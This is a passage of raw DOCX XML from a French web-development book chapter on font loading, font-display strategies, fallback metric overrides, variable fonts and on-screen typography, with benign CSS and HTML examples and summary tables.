                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Absent : texte invisible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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unicode-range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Sous-ensemble</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Fichier trop lourd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>size-adjust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3181"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Métriques de repli</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucun ajustement</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`FONT-DISPLAY`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Stratégie d'affichage pendant le chargement du fichier : </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>block</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> masque le texte, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>swap</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> affiche immédiatement la police de secours, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>fallback</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>optional</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> arbitrent différemment entre vitesse et fidélité.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux stratégies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swap : le texte est lisible tout de suite */</w:t>
        <w:br/>
        <w:t>@font-face { font-family: "Titre"; src: url("titre.woff2"); font-display:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  swap; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* optional : si la police n'arrive pas vite, elle n'est pas utilisée */</w:t>
        <w:br/>
        <w:t>@font-face { font-family: "Corps"; src: url("corps.woff2"); font-display:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  optional; }</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`FONT-DISPLAY: BLOCK` MASQUE LE TEXTE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Pendant le chargement, le texte est invisible : pendant trois secondes, l'utilisateur voit des blocs vides. Réservez ce mode aux titres courts dont le fichier est local et rapide.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>43.2 Métriques et substitution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le passage de la police de secours à la police chargée provoque un décalage de mise en page si les métriques diffèrent. Deux réglages réduisent ce phénomène.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un repli ajusté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Ajuster la police de repli aux métriques de la police cible */</w:t>
        <w:br/>
        <w:t>@font-face {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-family: "Inter-fallback";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  src: local("Arial");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  size-adjust: 107%;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ascent-override: 90%;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  descent-override: 22%;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  line-gap-override: 0%;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>:root { --police-texte: "Inter", "Inter-fallback", system-ui, sans-serif; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.145 — Quatre réglages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9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Réglage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Limite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>size-adjust</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Corrige la taille relative</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Ne règle pas l'interligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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ascent-override</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Aligne la ligne de base</w:t>
            </w:r>
          </w:p>
        </w:tc>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Valeurs à mesurer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>preload</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Charge plus tôt</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Consomme de la bande passante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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unicode-range</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Charge par sous-ensemble</w:t>
            </w:r>
          </w:p>
        </w:tc>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Découpage à maintenir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux règles de préchargement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 Précharger uniquement la police du titre --&gt;</w:t>
        <w:br/>
        <w:t>&lt;link rel="preload" href="/polices/titre.woff2" as="font" type="font/woff2"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      crossorigin&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Ne pas précharger plus de deux fichiers : la bande passante est partagée</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --&gt;</w:t>
        <w:br/>
        <w:t>&lt;!-- La police doit être servie avec un cache long et une empreinte dans le</w:t>
        <w:br/>
        <w:t xml:space="preserve">  nom --&gt;</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DÉCALAGE CUMULÉ DE MISE EN PAGE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Somme des déplacements visuels subis par le contenu pendant le chargement, mesurée par la métrique CLS. Une police à métriques différentes en est une cause fréquente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>43.3 Polices variables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une police variable contient plusieurs graisses et largeurs dans un seul fichier. On l'utilise par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>font-weight</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>font-stretch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, et par les axes personnalisés du dessinateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une police variable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@font-face {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-family: "Recia";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  src: url("/polices/recia-var.woff2") format("woff2");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-weight: 300 900;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-stretch: 75% 125%;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>h2 {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-family: "Recia", serif;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-weight: 620;              /* valeur intermédiaire */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-stretch: 105%;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-optical-sizing: auto;     /* axe optique si disponible */</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Axes personnalisés : à utiliser avec parcimonie */</w:t>
        <w:br/>
        <w:t>.surtitre {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-variation-settings: "wght" 480, "slnt" -6;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.146 — Quatre usages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83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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Recommandation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Raison</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Graisse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>font-weight</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Interpolation native</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Largeur</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font-stretch</w:t>
            </w:r>
          </w:p>
        </w:tc>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Interpolation native</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>font-style: oblique -6deg</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Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Axe propriétaire</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font-variation-settings</w:t>
            </w:r>
          </w:p>
        </w:tc>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Non interpolable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UN FICHIER VARIABLE PEUT ÊTRE PLUS LOURD QUE DEUX STATIQUES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une police variable complète pèse parfois 200 à 400 ko. Pour n'utiliser que deux graisses, deux fichiers statiques sous-ensemble peuvent être plus légers : mesurez.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>43.4 Typographie à l'écran</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La lisibilité d'un paragraphe dépend de trois réglages : la taille, l'interligne et la longueur de ligne. Un texte trop large fatigue, un texte trop étroit hache le rythme.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois réglages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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --mesure: 68ch;            /* longueur de ligne confortable */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --corps: clamp(1rem, 0.95rem + 0.25vw, 1.125rem);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.article p {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  max-inline-size: var(--mesure);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-size: var(--corps);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  line-height: 1.6;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  text-wrap: pretty;         /* évite les lignes orphelines */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  hyphens: auto;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>h1 { text-wrap: balance; }   /* équilibre les lignes d'un titre */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.147 — Cinq réglages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9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Réglage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Valeur usuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Longueur de ligne</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45 à 75 caractères</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Confort de lecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Interligne</w:t>
            </w:r>
          </w:p>
        </w:tc>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1,4 à 1,7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Respiration verticale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Taille du corps</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16 à 19 px</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lisibilité mobile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Espacement des mots</w:t>
            </w:r>
          </w:p>
        </w:tc>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Par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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À éviter de modifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
